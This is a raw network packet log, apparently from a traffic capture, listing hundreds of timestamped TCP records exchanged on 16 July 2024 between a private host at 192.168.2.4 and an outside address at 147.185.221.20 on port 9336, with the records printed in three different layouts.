Jul 16, 2024 21:07:11.482137918 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.482144117 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.482165098 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.482175112 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.504602909 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.505251884 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.511132002 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.511213064 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.511276007 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.511334896 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.511352062 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.511396885 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.511410952 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.511485100 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.511784077 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.511811972 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.511837006 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.511840105 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.511857033 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.511868954 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.511884928 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.511920929 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.511949062 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.511971951 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.511976957 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.511990070 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.512006998 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512032032 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.512046099 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.512057066 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512085915 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512134075 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.512135983 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512164116 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512206078 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.512217999 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512247086 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512295008 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.512296915 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512326956 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512373924 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.512376070 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512403965 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512450933 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.512608051 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512636900 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512665033 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512685061 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.512691975 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.512717009 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.512736082 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516057968 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516102076 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516258955 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516273022 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516315937 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516318083 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516330004 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516357899 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516371012 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516374111 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516386032 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516401052 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516411066 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516419888 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516454935 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516458035 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516469002 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516495943 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516514063 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516526937 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516536951 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516573906 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516586065 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516616106 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516623020 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516628027 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516668081 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516681910 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516695023 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516721964 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516736984 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.516755104 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516767025 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.516809940 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.517215014 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517273903 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.517321110 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517345905 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517359018 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517390013 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.517410994 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.517437935 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517451048 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517463923 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517474890 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.517510891 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.517612934 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517627001 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517666101 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517668009 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.517679930 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517693996 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517718077 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517728090 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.517730951 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517745018 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517761946 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.517769098 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517781973 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:11.517790079 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:11.517795086 CEST | 9336 | 49737 | 147.185.221.20 | 192.168.2.4
                                                                                Jul 16, 2024 21:07:11.517807007 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.517807961 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.517821074 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.517849922 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.517923117 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.517936945 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.517950058 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.517962933 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.517970085 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.517976046 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.517988920 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518003941 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518003941 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518030882 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518038988 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518045902 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518055916 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518059969 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518074036 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518086910 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518088102 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518105030 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518112898 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518115044 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518126965 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518135071 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518142939 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518157005 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518162012 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518172026 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518181086 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518183947 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518194914 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518198967 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518208981 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518220901 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518243074 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518254995 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518280983 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518295050 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518318892 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518346071 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518348932 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518359900 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518378019 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518390894 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518403053 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518415928 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518415928 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518430948 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518440962 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518455029 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518455982 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518471003 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.518472910 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518492937 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.518515110 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521306992 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521327972 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521339893 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521373034 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521392107 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521663904 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521677017 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521709919 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521723032 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521738052 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521742105 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521749973 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521763086 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521764994 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521776915 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521780014 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521792889 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521802902 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521816015 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521822929 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521828890 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521842003 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521850109 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521855116 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521864891 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521867990 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521883965 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521883965 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521897078 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521900892 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521910906 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521914005 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521924019 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.521948099 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.521967888 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522058010 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522073030 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522084951 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522097111 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522131920 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522150040 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522162914 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522188902 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522200108 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522202969 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522209883 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522229910 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522243023 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522243023 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522253036 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522257090 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522268057 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522283077 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522285938 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522298098 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522300005 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522310972 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522320986 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522336006 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522336960 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522351027 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522355080 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522362947 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522377014 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522388935 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522392035 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522403002 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522404909 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522416115 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522420883 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522428989 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522442102 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522443056 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522454977 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522469997 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522476912 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522484064 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522497892 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522515059 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522522926 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522531986 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522536039 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522548914 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522552013 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522562981 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522574902 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522587061 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522587061 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522600889 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522610903 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522644043 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522694111 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522707939 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522721052 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522732973 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522746086 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522754908 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522758007 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522790909 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522792101 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522813082 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522819042 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522825956 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522835970 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522840977 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522855043 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522867918 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522870064 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522881031 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522886038 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522893906 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522911072 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522918940 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522933006 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522934914 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522945881 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522950888 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522959948 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522973061 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522979021 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.522988081 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.522995949 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.523016930 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.523022890 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.523036957 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:11.523037910 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.523061037 CEST497379336192.168.2.4147.185.221.20
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jul 16, 2024 21:07:11.523071051 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523112059 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523125887 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523138046 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523158073 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523169994 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523186922 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523194075 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523242950 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523256063 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523287058 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523296118 CEST  49737  9336   192.168.2.4     147.185.221.20
